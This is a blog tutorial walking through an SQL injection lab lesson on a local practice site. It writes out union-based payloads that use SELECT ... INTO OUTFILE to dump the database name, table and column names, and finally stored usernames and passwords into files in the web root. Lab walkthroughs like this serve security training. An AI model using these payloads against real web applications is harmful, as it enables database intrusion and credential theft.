In our previous article you have learned the basic concepts of SQL
injection but in some scenarios you will find that your basic knowledge and
tricks will fail. Today we are going to perform SELECT...INTO OUTFILE statement is easiest
way of exporting a table records into a text
file or excel file
This
statement allows
user to load table information very rapidly to a text file on the server
machine. SELECT ... INTO OUTFILE writes the significant rows to a file, and gives authority to the use
of column and row terminators to specify output format. The output file is
created directly by the MySQL server, so the filename with path should be specify
where user want the file to be written on the server host. The file must not
exist already on server. It cannot be overwritten. A user requires the FILE privilege to run this statement.
Let’s start!!
Lesson 7
Open the browser and type following SQL query in URL
http://localhost:81/sqli/Less-7/?id=1
From screenshot you can read “you are in….. Use outfile”
now let’s try to break this statement.
OKAY! The Query has been broken successfully we receive the error message
when we had used single quote (‘) in
order to break query hence it confirms that it is vulnerable.
After
making lots of efforts finally successfully the query gets fixed, if noticed
the step for SQL injection is similar as previous chapter only techniques to
fix the query is different.
Now
following query will dump the result into a text file. Here you need to mention
the path where user wants the
file to be written on the server host. The file must not exist already on
server user always use new text file for over writing database information.
http://localhost:81/sqli/Less-7/?id=1'))
union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt"
--+
From
screenshot you can perceive that still it is showing error message now open
another tab for the output of resultant query.
Now add file name
hack1.txt to check output of above query.
hence you
can see we get output of executed query inside text file. This will save
hack1.txt file inside the server machine also.
Execute following query to retrieve database name using
union injection using a new text file.
http://localhost:81/sqli/Less-7/?id=1')) union select
1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+
Hence
you can see we have successfully get security as database name as result.
Next query will provide entire table names saved inside
the database using another text file.
http://localhost:81/sqli/Less-7/?id=1')) union select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=database() into outfile
"/xampp/htdocs/sqli/Less-7/hack3.txt" --+
From screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users
Now we’ll try to find out column names of users table
using following query.
localhost:81/sqli/Less-7/?id=1'))
union select 1,group_concat(column_name),3 from information_schema.columns
where table_name='users' into outfile
"/xampp/htdocs/sqli/Less-7/hack4.txt" --+
Hence you can see it contains so many columns inside it I
had chosen only two columns for further enumeration.
C1: username
C2: password
At last execute following query to read all username and
password inside the table users from inside its column.
http://localhost:81/sqli/Less-7/?id=1')) union select
1,group_concat(username),group_concat(password)from users into outfile
"/xampp/htdocs/sqli/Less-7/hack5.txt" --+
From screenshot you can read the username and password save
inside text file.
Note: you can
try same attack using excel file; attacker only need to change hack1.txt into hack1.csv which will save the output into excel file.
0 comments:
Post a Comment